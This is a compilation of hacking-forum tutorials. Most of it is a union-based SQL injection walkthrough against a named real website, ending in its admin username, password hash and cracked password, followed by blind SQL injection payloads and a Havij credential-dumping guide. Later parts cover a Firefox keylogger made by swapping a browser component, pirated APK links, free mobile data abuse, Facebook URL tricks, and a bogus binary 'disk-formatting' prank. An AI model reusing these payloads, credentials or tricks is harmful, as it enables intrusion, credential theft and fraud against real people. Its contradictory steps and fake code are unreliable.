SQL Injection Manually (Full Tutorial with images)

Hello , today I will show you how much SQL i Can be Easy : )

Introduction :


What Is SQL i? ( SQL injection )
SQL injection is a basic in Web hacking , and its the first way to debut Exploiting sites .


How To Find SQLi Vuln Sites , & Inject Them :

This is very simple , just use that  dorks with a SQLi Scanner , Or Google then check every site by your self .


now to check manually is a site is SQLi vuln , just add ' at the end of the url :

For example , we have our target ,

Quote:http://www.cocobod.gh/news_details.php?id=30

now , we want to check if the is SQLi vuln , so we add ' at the end :

Quote:http://www.cocobod.gh/news_details.php?id=30'

if we got an error , that means that he is Vuln : )

So , now we move to next Step .

How To Find Columns Count :

after you have your vuln site , u need to know his columns count , to do it , just add "order by X--" at the end of the URL ,
X is a number from 1 to unlimited : d .

For example , we have our target server and we try to count columns ,
we add order by 1-- at the end , then order by 2-- *ect.. , always increase number till u got an error in your website like thise one :



So , in our target server , we have tryed this :

Quote:http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column

http://www.cocobod.gh/news_details.php?id=30 order by 8-- *>> Unknown column

that means that the 5th column does not exist , that means that column count is 7 : D


How to Find The Acsessable Columns :


Now , we now that column count is 4 , next step is to check for acsessable columns , to do that , we use this querie "UNION SELECT number,of,columns--" like this :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,6,7--

that means that we can get informations from the site from the 6th , the 2nd , and the 3rd column *: D , haha we got the used columns : D .


How To Get MySQL DB Version :

we need to know MySQL DB Version to know if we can exploit this site or not , cox every site that is using MySQL 4.x.x > u can't work on it , but every 5.x.x or above is exploitable : ) .
so to know MySQL DB Vesrion , just replace the number of the used column with "@@version"

for example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7--

that means that we can continue working on this site .


How To Find Database Name :


Now , we are going to inject the site to know DB Name ,
to do this , replace the used column number with "group_concat(schema_name)" , and add "from information_schema.schemata--" after the last column number , for example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--

now , to use the one the website use , replace "group_concat(schema_name)" with "concat(database())" for example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Congratz , you got the used DB : D .


How to Get The Table Names :


Now we need to get Table names , to do this , replace the used column number with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()--" at the end of columns number .

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

How To Get Column Names :


To get column names , we will use this queries :
group_concat(column_name)
from information_schema.columns where table_schema=database()--

Example :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--

How To Get Informations From Columns :


Now , we are in Our Final Step , now we will get the admin infos from column , How to do it?
Simple , Follow this example :

Quote:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from currentdb.tableused--

So our exploit will be like this :

Quote:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(username,0x3a,password),7 from cocobod_gh.coc_admin--

now we need to decrypt the password that is crypted in md5 ,
go to http://www.md5decrypter.co.uk/ past your hash , fill the captcha and clic on decrypt , with a little luck , you will get the pass like here : )



comaster:2c39e3769d300f7e23f8a9e1e21773e7
comaster:cocoadmin4682

username : comaster
password : cocoadmin4682

We have successfully injected a website , and got the admin info

Blind SQL Injection (Full Tutorial)

Hey guys in this tut i will tell you how to hack a website with Blind SQL Injection.
I mostly use ordinary SQL Injection myself but sometimes the "union" command don't work or we don't get a versions name
thats why Blind SQL Injection is important too.
ok lets start
first find your victim site. Blind SQL Injections works often on ordinary SQL Injection vulnerable pages too.

well our victim in this tutorial is : http://www.blind-sql-injection-tut.com/index.php?id=7

Testing if our Victims is vulnerable :

now we have to test if our victim is vulnerable for Blind SQL Injection.
add this

and 1=0

example url : http://www.blind-sql-injection-tut.com/index.php?id=7 and 1 = 0
now we should get a error.

now add

and 1 = 1

example url : http://www.blind-sql-injection-tut.com/index.php?id=7 and 1 = 1

Now we will see the website without a error message.
That means that our victim is vulnerable

Find out MySQL version

Now you have to add and

SUBSTRING(version(),1,1)=5

if you see the website whitout a error the version is 5.
If you get a error try 4 or 3

Lets do the Injection

The way to do the injection is a bit different to the ordinary way. We don't search for tables etc we only try to get
the password. First we try to get the first letter of the password. You will need this Asci Table
use this

and ascii(substring((SELECT password from users limit 0,1),1,1))>70

we get a error the asci is to high lets try some lower value
try

and ascii(substring((SELECT password from users limit 0,1),1,1))>64

no we don't get a error that means that the asci value is higher then 64
lets try 86

and ascii(substring((SELECT password from users limit 0,1),1,1))>66

no we get a error . That means our asci is to high. But we no that we didn't got a error at 85 that means our asci is 65.
Now check 85 in asci table. 65 means "A" that means that the first letter of our password is "A"

now we have to get the second latter.

and ascii(substring((SELECT password from users limit 0,1),2,1))>80

result : error (to high)

and ascii(substring((SELECT password from users limit 0,1),2,1))>75

result : no error (to low)

and ascii(substring((SELECT password from users limit 0,1),2,1))>76

result : error
no we know that the second letter of the password is in asci 75. Open your asci table and check which latter that is
75 = K
now we know the first two letters of the password : AK

well i think you know now how it works to get the next letters you only have to change : 2,1 into 3,1

example :
first letter : "and ascii(substring((SELECT password from users limit 0,1),1,1))>70"
second lettter : "and ascii(substring((SELECT password from users limit 0,1),2,1))>70"
third letter : "and ascii(substring((SELECT password from users limit 0,1),3,1))>70"

SQL Injection through Havij (Full Tutorial)

Firstly i am going to introduce the term havij :)

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Download havij 1.10

First Find a sqli infected site .Now here i found a vulernable site

http://www.hypetrading.com/productinfo.php?id=285

Now Let's start

Open havij and copy and paste infected link as shown in figure

Now click in the "Analyze"
Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

In that Just put mark username and password and click "Get data"

Bingo Got now id and pass that may be admin...

The pass will get as md5 you can crack it also using this tool as shown in figure...

CODE THAT FORMATS UR ENEMEY'S COMPUTER.........PLZZ DON'T TRY DIS IN UR PC

Paste the below code in a notepad file:

0100101100011111001001010101010101

Save the file as
'whateveryouwish.exe'
When you open it, the hard
disk formats!!!
You can keep this file in
your school's computer in a
far-off folder.
At first
rename it and send a
shortcut to desktop. Now
hide the original file. Change the icon of the
shortcut to that of My
computer and rename it as
'My Computer' and delete
the original 'My computer'. When someone tries to
open it....BOOOM!!!
If you are unable to format
C drive when the victim's
PC is running, then you can
use the following line of
code:

0110011001101111011100100110110101
100000011000110011101001011100
0010000000101111010100010010111101

It's extremely cool!!! How about making the
computer not to boot in
the first place??
Then use this code:

0110010001100101011011000010000000
101111010100110010111101010001
0010000001100011001110100101110001
101111011101000010111001101001
0110111001101001

You will be astounded at
the result when someone
tries to restart the PC!
NOTE : THIS IS JUST FOR
EDUCATIONAL PURPOSE......

How to Auto Save Passwords Without Notification in Internet Explorer

This brief tutorial will show you how to
save your passwords and username
automatically, without this annoying
notification!

1. Click Tools.
2. Click Internet Options.
3. Select the Content tab.
4. Under the Autocomplete section, click
Settings.
5. At this point, the Auto Complete settings
Dialog box will popup. Untick the Prompt
me to save passwords check box.
6. Click OK to save.

How to make android application cracked to make them Full version

Android Apps Cracked Full version

Many people seem to be asking the same
thing. Yes you can get cracked apps for
Android too.
1st Method :

http://www.applanet.net/

But as it is down since many days, skip to
step 2


2nd Method:

http://thepiratebay.org/
torrent/6287940/1380_Paid_Android_Apps_and_Games_APK

Simple.
I am sure old to many. But only for those
who don't know.

To install just download the .apk file and
transfer to phone. Then using file explorer
open the file.

Make sure in setting>application>unknown
sources option is checked.

Any other better option please feel free to
share.
Also share your favorite apps from Android
below if you want.
Enjoy !!

Tag anyone on facebook

Reverse engineering Html script to tag
anyone on facebook even when they are
not in your friend list (To be pasted on the Address(or)URL bar while logged in
facebook).

Script:

http://www.facebook.com/connect/
prompt_feed.php?
api_key=2231777543&message=@
[633515734:0:Your comment here]


633515734 --->Is the target facebook ID of the person you wist to tag.
Your comment here--->Enter your desired
comment here


P.S--->Switching of the API keys might
cause the script not to work change Api
keys on your own risk.

How to use old facebook chat

As we all know that facebook now combined with skype to install one more feature in chat. And its vedio calling service, now if your internet inclined with a high speed or you use 3G to more speed net then only you can chat on facebook.
But what about the old facebook chat ?
Ohh well there is only one way to get old facebook chat back.
Just pop out the chat in new window from the following link.

http://www.facebook.com/presence/popo​ut.php

Or if you use mozilla firefox then you can install this GM script (You may first need
to install Greasemonkey)

http://www.userscripts.org/scripts/
show/107107

Enjoy with old facebook chat :)
BY- xtream coder

Free TATA DOCOMO UNLIMITED internet with 3G service

Well as you all know that am too much crazy about hacking stuffs and coding. Am using tata docomo service from 2010 and today most of people want free internet tricks. So am revealing my top new secret about 3G internet.

So,
Are you tired of using the low speed 2G
service? I know your answer is ‘YES’. We all
want to lay our hands on the latest high
speed 3G service which gives a download
speed of 500 kbps to 1000 kbps. Today I
will show a trick using which you can use
unlimited 3G service for free.
Requirements
1. Tata Docomo SIM Card with a balance of
more than Rs. 1
2. 3G enabled cellphone
Steps
1. Create New Access Point Using Below
Configuration and restart your cellphone.
Name : Tata Docomo or any
Access Point ( APN ) – tata.docomo.dive.in
Homepage : www.google.com or any
Proxy : 202.87.41.147
Proxy Port : 8080
Username : leave blank
Password : leave blank

2. Download Operamini 4.2 Handler Browser

3. Open your Opera mini handler and do the
following changes in the Setiings:
Set Divein Settings as Default Settings For
Opera Mini
Set http in Custom Field in your Opera Mini
handler
Set Socket Server to
http://203.115.112.5.server4.operamini.com
OR
http://10.124.72.171.server4.operamini.com
Keep Proxy Type as blank (Don’t Enter
Anything in Proxy Server Field)

4. Done!! Now use your free unlimited 3G
service. Enjoy!!

FB Status with image

Now you can put any image in your status.
Just a simple code here developed by xtream coder, by using following code you can update facebook status with any image you want :)

Reverse engineering html script to update status with image

http://www.facebook.com/connect/prompt_feed.php?preview=true&display=touch&api_key=2254487659&callback=http://facebook.com/&cancel=https://www.facebook.com/groups/128042045784?ref=ts&attachment={'media':[{'type':'image','src':'http://www.smileyvault.com/albums/CBSA/smileyvault-cute-big-smiley-animated-025.gif','href':'https://www.facebook.com/groups/128042045784?ref=ts'}]}&target_id


2254487659-
API key(Change it to ur desired device)
What to do -Now put copy that code and put it in your url bar and hit enter.


Image link-
http://www.smileyvault.com/albums/CBSA/smileyvault-cute-big-smiley-animated-025.gif -you can put ur own image link here(Can be replaced with ur desired image link preferrably jpeg,gif,png)



P.S-Experiment with this script to make small changes like linking ur friend to the photo u post...

Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

We usually store the username and passwords of the websites that we access regularly into Firefox to skip the need of entering the username and password over and again.Firefox stores the username and password for websites by user’s permission.These username and passwords are stored in an encrypted manner into Firefox sign-on database.

But this can be very harmful to you if somebody access your computer as these passwords can be decrypted easily.So,your accounts may get hacked.I will also show you the method to protect yourself from getting hacked .This trick works on all operating systems like windows xp,vista and windows 7.It also supports all Firefox browser versions.

Here is a step by step tutorial with screenshots on Trick to Decrypt Passwords Stored in Firefox With FirePasswordViewer

1. Download FirePasswordViewer.This is freeware utility and is also available in portable version.
2. After downloading run the portable version of the software.
3. It will automatically find the path of your Firefox user profile.
4. Now click on Start Recovery button.It will list all the stored website with username and password.

5. The passwords are hidden.To unhide them Click on the Show Password button

6. You can also store the results in HTML format by clicking on the button Save as HTML

Now if you want to protect yourself from such a hack I have a solution for you.To stop tools such as FirePasswordViewer accessing and decrypting your secret information you can set a master password in firefox.To set a master password goto Tools >> Options >> Security and now check the Master password checkbox.Enter your password and now your information is secure.

Note: The aim of this tutorial is to help you recover your passwords stored in your firefox browser  and to protect you from getting hacked.

Trick on How to Convert Firefox into keylogger

Do you want create your own working undectable keylogger and without any programming knowledge.The keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent.

How this Keylogger Works?

Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.

We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.

Can this be detected by antivirus?

I have scanned it with Mcafee,Norton and Avast and it is totally undetectable.

Does It work on all websites?

It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail.

Now I will give you the step by step tutorial on how to use this trick.

1. Download this script here
2. Now go to the following address

If you are Windows user then goto

C:/Program Files/Mozilla Firefox/Components

If you are MAC user then goto

Applications > Right click Firefox > Show Package Contents >Contents/MacOS/Components

1. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be replacing this file in next step.
2. Extract the script folder that you have downloaded in first step and copy and paste the nsLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
3. So now your firefox keylogger is ready.Now Each and every username and password will be automatically saved.

The next step is to retrieve the username and passwords that have been stored in your firefox browser.

It is very easy to retrieve the password from firefox using firepasswordviewer. (Click Here) For more detail about

Decrypt Passwords Stored in Firefox With FirePasswordViewer

Usefull Firefox Addons for Facebook

1. YOONO

It really simplify your social life in facebook, easy to get instant updates from your friends in facebook while your surf, make easy for your to monitor all of your social sites in multiple tabs. You can also add your twitter, youtube, myspace, linked_in etc., account to yoono.

Download Link : https://addons.mozilla.org/en-US/firefox/addon/1833/




2. FB TOOLBAR

It completely integrate facebook into your browser, make easy to monitor your friends updates, chat, from this single toolbar. It also allows you to search, upload photos, conntect with friends, share content while surfing in facebook, so if you addicted to facebook you should surely try this one.

Download link : https://addons.mozilla.org/en-US/firefox/addon/facebook-toolbar/




3. PHOTO ZOOM

A magnifier for facebook thumbnails (either profile pictures or album photos). When the mouse is over a thumbnail, a tooltip will appear with the bigger image in it.
Download link : https://addons.mozilla.org/en-US/firefox/addon/facebook-photozoom/




4. HUGBACK FOR FACEBOOK


It will Change all ‘poking’ on Facebook to the lovable action of ‘hugging’!
Download link : https://addons.mozilla.org/en-US/firefox/addon/hugback-for-facebook/




5. QWISK – SHARE, DISCOVER AND DISCUSS COOL PAGES


Qwisk is a lightweight and functional addon that lets you share and discuss content with friends and communities as you browse. With a single click or drag and drop, you can share links, comments, and images – all in true real-time!
— Download link : https://addons.mozilla.org/en-US/firefox/addon/qwisk-share-discover-and-discu/


6. FACEBOOD FACEPAD
FacePAD (Facebook Photo Album Downloader) allows you to download entire Facebook albums with a click of a button, so you can access your favorite albums in offline.
— Download link : https://addons.mozilla.org/en-US/firefox/addon/photojacker/


7. AD BLOCK PLUS

Annoyed by advertisers, tracking and Ad-banners ? Install Adblock Plus now to regain control of the internet and change the way that you view the web.
— Download link : https://addons.mozilla.org/en-US/firefox/addon/adblock-plus/


9. FB CHAT HISTORY

Chat history manager Firefox extension which can save your Facebook chat messages in your browser, so You can view your chat history anytime either online or offline.
— Download link: https://addons.mozilla.org/en-US/firefox/addon/facebook-chat-history-manager/






10. FACEMOODS – FACEBOOK CHAT EMOTICONS !

Now you add more emotions to your facebook chat using this handy firefox addon, which will impress your friends and give some life to your chat.
— Download link https://addons.mozilla.org/en-US/firefox/addon/facemoods/



11. DISLIKE BUTTON

As you know very well about “like” button in facebook, dislike is just opposite to it. If you find any thing annoying or if you dis-agree with your friends updates, you can “dislike” it easily with this cool tool.
— Download link : https://addons.mozilla.org/af/firefox/addon/facebook-dislike/